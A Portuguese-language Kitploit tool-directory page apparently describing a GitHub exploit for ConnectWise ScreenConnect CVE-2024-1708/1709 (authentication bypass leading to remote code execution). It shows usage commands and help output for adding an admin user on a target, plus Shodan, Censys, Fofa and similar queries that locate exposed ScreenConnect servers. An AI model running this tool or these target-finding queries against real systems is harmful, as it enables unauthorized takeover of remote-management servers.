Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ScreenConnect-AuthBypass-RCE — ScreenConnect Bypass de Autenticação (cve-2024-1709) --> RCE!!! | Kitploit
Ferramentas/GitHubGitHub/w01fh4cker/screenconnect-authbypass-rce
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubw01fh4cker/screenconnect-authbypass-rce

ScreenConnect-AuthBypass-RCE

ScreenConnect Bypass de Autenticação (cve-2024-1709) --> RCE!!!

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
11134há 2 anosRevisado pelo Kitploit

Como usar

Estou usando Python3.9

root@kitploit:~
pip install requests
# python check.py
python batchAdduser.py

root@kitploit:~
python ScreenConnect-AuthBypass-RCE.py -h

usage: ScreenConnect-AuthBypass-RCE.py [-h] [-u USERNAME] [-p PASSWORD] -t TARGET [-d DOMAIN] [--proxy PROXY]
                                                                                                             
CVE-2024-1708 && CVE-2024-1709 --> RCE!!!                                                                    
                                                                                                             
optional arguments:                                                                                          
  -h, --help            show this help message and exit                                                      
  -u USERNAME, --username USERNAME                                                                           
                        username you want to add                                                             
  -p PASSWORD, --password PASSWORD
                        password you want to add
  -t TARGET, --target TARGET
                        target url
  -d DOMAIN, --domain DOMAIN
                        Description of domain
  --proxy PROXY         eg: http://127.0.0.1:8080

Por exemplo:

root@kitploit:~
python ScreenConnect-AuthBypass-RCE.py -t http://192.168.9.100

Bug?NÃO!

Quando você encontrar a seguinte situação, isso indica que o site não pode ser RCE através deste script.

Os motivos específicos podem ser encontrados em:

https://screenconnect.product.connectwise.com/communities/1/topics/1653-whitelist-custom-extensions-in-65

https://bishopfox.com/blog/connectwise-control-advisory

https://www.connectwise.com/globalassets/media/documents/connectwisecontrolsecurityevaluationmatrix.pdf

Se você conseguir obter uma assinatura legal, por favor, abra issues, muito obrigado.

Declaração de mapeamento do ciberespaço

Odin

root@kitploit:~
services.modules.http.headers.server:"screenconnect"

Zoomeye

root@kitploit:~
app:"ScreenConnect Remote Management Software"

Censys

root@kitploit:~
services.http.response.headers:(key: `Server` and value.headers: `ScreenConnect`)

Shodan

root@kitploit:~
"Server: ScreenConnect"

Hunter.how

root@kitploit:~
product.name="ConnectWise ScreenConnect software"

Fofa

root@kitploit:~
app="ScreenConnect-Remote-Support-Software"

Referência

https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8

https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc

https://github.com/rapid7/metasploit-framework/pull/18870

Baixar ferramenta